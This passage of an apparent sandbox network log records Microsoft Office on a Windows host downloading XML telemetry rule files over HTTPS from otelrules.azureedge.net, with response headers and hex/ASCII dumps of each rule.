7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-09 01:47:23 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.7	49764	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:23 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:23 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:23 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: de083b16-101e-0079-14f1-2c5913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014723Z-16547b76f7f67wxlhC1DFWah9w0000000ah0000000002wcn x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:23 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.7	49766	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:23 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:23 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: c86420e9-201e-003c-5083-3130f9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014723Z-17df447cdb5km9skhC1DFWy2rc000000071g00000000f82k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:23 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.7	49767	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:23 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:24 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:23 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: a288df0b-b01e-00ab-0601-2ddafd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014723Z-16547b76f7fp46ndhC1DFW66zg0000000aeg00000000khca x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-09 01:47:24 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.7	49769	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:24 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:24 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:24 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: fb68cf1d-a01e-001e-3b01-2d49ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014724Z-16547b76f7ftdm8dhC1DFWs13g0000000ae000000000br6n x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-09 01:47:24 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.7	49771	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:24 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:24 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:24 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: 7b7195f4-601e-0050-1f60-2e2c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014724Z-15869dbbcc6tfpj2hC1DFW384c000000049g000000003zxk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:24 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.7	49773	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:24 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:24 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: 26055832-201e-0096-545c-2eace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014724Z-15869dbbcc6khw88hC1DFWbb200000000490000000007fnh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:25 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.7	49765	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:24 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:24 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:24 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: 2e6eb393-601e-0097-4b00-2df33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014724Z-16547b76f7fknvdnhC1DFWxnys0000000ak0000000005bqp x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:24 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.7	49772	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:24 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:25 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:24 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: 32d5e889-e01e-0099-1f00-2dda8a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014724Z-16547b76f7fknvdnhC1DFWxnys0000000af000000000h0d9 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:25 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.7	49774	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:24 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:25 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:24 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: ac6bbd40-501e-007b-3e0c-2d5ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014724Z-16547b76f7f775p5hC1DFWzdvn0000000ae000000000cbhn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-09 01:47:25 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.7	49775	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:25 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:26 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:25 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: 1e70bdcb-401e-0029-2301-2d9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014725Z-16547b76f7fwvr5dhC1DFW2c940000000a7g00000000w295 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:26 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.7	49776	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:25 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:26 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:25 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: f3c8b028-b01e-003d-2400-2fd32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014725Z-17df447cdb5c9wvxhC1DFWn08n000000073g000000006gwz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:26 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.7	49778	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:26 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
